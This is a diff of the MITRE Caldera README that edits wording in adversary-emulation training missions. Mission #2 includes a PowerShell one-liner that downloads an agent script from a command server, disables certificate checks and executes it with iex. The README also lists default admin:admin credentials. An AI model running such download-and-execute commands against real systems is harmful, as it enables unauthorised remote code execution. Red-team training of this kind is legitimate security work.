mitre/caldera/README.md

 the mission a success?
 Did the mission1 adversary run without a trace?
 Can you figure out why the abilities are being run in the order they are?

+*Extra credit: go to https://localhost:8888 in a browser, logging in with the credentials admin:admin, and click into the Chain mode plugin.
+Can you see how you'd manage an operation from the GUI?*

 ### Mission #2: PowerShell reconnaissance

 *This mission requires PowerShell 3.0+ and is compatible with the open-source version.*

 > Perform reconnaissance on a compromised Windows laptop.
 Your employer needs a list of all processes running on the machine, so make sure this is fetched first.
-Then perform other recon abilities and get out before you get caught.
+Then, perform other recon tasks and get out before you get caught.

 Perform the same steps as mission #1 - with the exception of:

-1. Start a PowerShell version of 54ndc47, instead of a bash one
+1. Start a PowerShell version of 54ndc47, instead of a bash version.
 ```
 $url="https://localhost:8888/file/render?group=client"; $ps_table = $PSVersionTable.PSVersion;If([double]$ps_table.Major -ge 6){iex (irm -Method Post -Uri $url -Headers @{"file"="54ndc47.ps1"} -SkipCertificateCheck);}else{[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$True};$web=New-Object System.Net.WebClient;$web.Headers.Add("file","54ndc47.ps1");$resp=$web.UploadString("$url",'');iex($resp);}
 ```

-2. Run the mission2 adversary, instead of mission1
+2. Run the mission2 adversary, instead of mission1.

 ## Developers